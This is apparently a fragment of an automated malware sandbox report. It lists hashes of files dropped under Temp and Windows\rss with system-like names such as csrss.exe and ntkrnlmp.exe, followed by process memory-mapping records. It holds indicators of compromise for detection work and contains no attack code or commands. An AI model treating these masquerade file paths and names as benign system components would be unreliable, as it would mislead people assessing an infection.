SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeMD5
c6e81bac5a3385a0a9cef0bf9b45c624
SHA1f52f673d68a66f212c25687aae6c054d89c9b47a
SHA2563414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c
SHA512328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855
-
\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeMD5
c6e81bac5a3385a0a9cef0bf9b45c624
SHA1f52f673d68a66f212c25687aae6c054d89c9b47a
SHA2563414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c
SHA512328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeMD5
9c84377ef100ddb897aab7f8a923c01e
SHA19750679980141b268eb5c0d9e593d312e0069098
SHA256c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d
SHA5121746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a
-
\Users\Admin\AppData\Local\Temp\csrss\ww31.exeMD5
9a4b7b0849a274f6f7ac13c7577daad8
SHA151219052fd31598113d1f30d938a560dd1434163
SHA256c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e
SHA512cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce
-
\Users\Admin\AppData\Local\Temp\csrss\ww31.exeMD5
9a4b7b0849a274f6f7ac13c7577daad8
SHA151219052fd31598113d1f30d938a560dd1434163
SHA256c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e
SHA512cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllMD5
f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeMD5
1afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeMD5
1afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeMD5
1afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\osloader.exeMD5
e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeMD5
e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeMD5
e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\symsrv.dllMD5
5c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeMD5
160dd398272fd4fdf51f410adad9a51b
SHA1f49489e7960978dd7dbb1784b0c67b1fd540926d
SHA2562bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e
SHA5128e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4
-
\Windows\rss\csrss.exeMD5
160dd398272fd4fdf51f410adad9a51b
SHA1f49489e7960978dd7dbb1784b0c67b1fd540926d
SHA2562bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e
SHA5128e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4
-
memory/328-48-0x0000000000000000-mapping.dmp
-
memory/528-59-0x0000000000000000-mapping.dmp
-
memory/604-49-0x0000000000000000-mapping.dmp
-
memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmpFilesize
4.6MB
-
memory/680-47-0x0000000000000000-mapping.dmp
-
memory/692-12-0x0000000004FB0000-0x0000000004FC1000-memory.dmpFilesize
68KB
-
memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmpFilesize
8.1MB
-
memory/796-57-0x0000000000000000-mapping.dmp
-
memory/796-46-0x0000000000000000-mapping.dmp
-
memory/816-44-0x0000000000000000-mapping.dmp
-
memory/828-53-0x0000000000000000-mapping.dmp
-
memory/904-72-0x0000000000400000-0x0000000000AB6000-memory.dmpFilesize
6.7MB
-
memory/904-70-0x0000000000000000-mapping.dmp
-
memory/908-123-0x0000000000000000-mapping.dmp
-
memory/952-10-0x0000000000000000-mapping.dmp
-
memory/1056-54-0x0000000000000000-mapping.dmp
-
memory/1140-56-0x0000000000000000-mapping.dmp
-
memory/1164-3-0x0000000000000000-mapping.dmp
-
memory/1212-50-0x0000000000000000-mapping.dmp
-
memory/1248-45-0x0000000000000000-mapping.dmp
-
memory/1260-39-0x000007FEF6F80000-0x000007FEF71FA000-memory.dmpFilesize
2.5MB
-
memory/1344-52-0x0000000000000000-mapping.dmp
-
memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmpFilesize
8.1MB
-
memory/1492-51-0x0000000000000000-mapping.dmp
-
memory/1500-55-0x0000000000000000-mapping.dmp
-
memory/1568-16-0x0000000000000000-mapping.dmp
-
memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmpFilesize
8.5MB
-
memory/1584-23-0x0000000003480000-0x0000000003491000-memory.dmpFilesize
68KB
-
memory/1584-21-0x0000000000000000-mapping.dmp
-
memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmpFilesize
1.9MB
-
memory/1588-97-0x0000000000000000-mapping.dmp
-
memory/1608-64-0x0000000000000000-mapping.dmp
-
memory/1648-5-0x0000000004E80000-0x0000000004E91000-memory.dmpFilesize
68KB
-
memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmpFilesize
8.5MB
-
memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmpFilesize
8.4MB
-
memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmpFilesize
8.5MB
-
memory/1648-2-0x0000000074D11000-0x0000000074D13000-memory.dmpFilesize
8KB
-
memory/1724-65-0x0000000000000000-mapping.dmp
-
memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmpFilesize
8.1MB
-
memory/1900-80-0x0000000000000000-mapping.dmp
-
memory/2020-74-0x0000000000000000-mapping.dmp
-
memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmpFilesize
8.1MB
-
memory/2024-17-0x0000000000000000-mapping.dmp
-
memory/2024-18-0x000007FEFB631000-0x000007FEFB633000-memory.dmpFilesize
8KB
-
memory/2120-111-0x0000000000400000-0x00000000007FD000-memory.dmpFilesize
4.0MB
-
memory/2120-109-0x0000000000000000-mapping.dmp
-
memory/2192-112-0x0000000000000000-mapping.dmp
-
memory/2192-124-0x00000000033F0000-0x00000000033F1000-memory.dmpFilesize
4KB
-
memory/2220-115-0x0000000000000000-mapping.dmp
-
memory/2220-119-0x0000000000400000-0x00000000007FB000-memory.dmpFilesize
4.0MB
-
memory/2260-117-0x0000000000000000-mapping.dmp
-
memory/2328-121-0x0000000000000000-mapping.dmp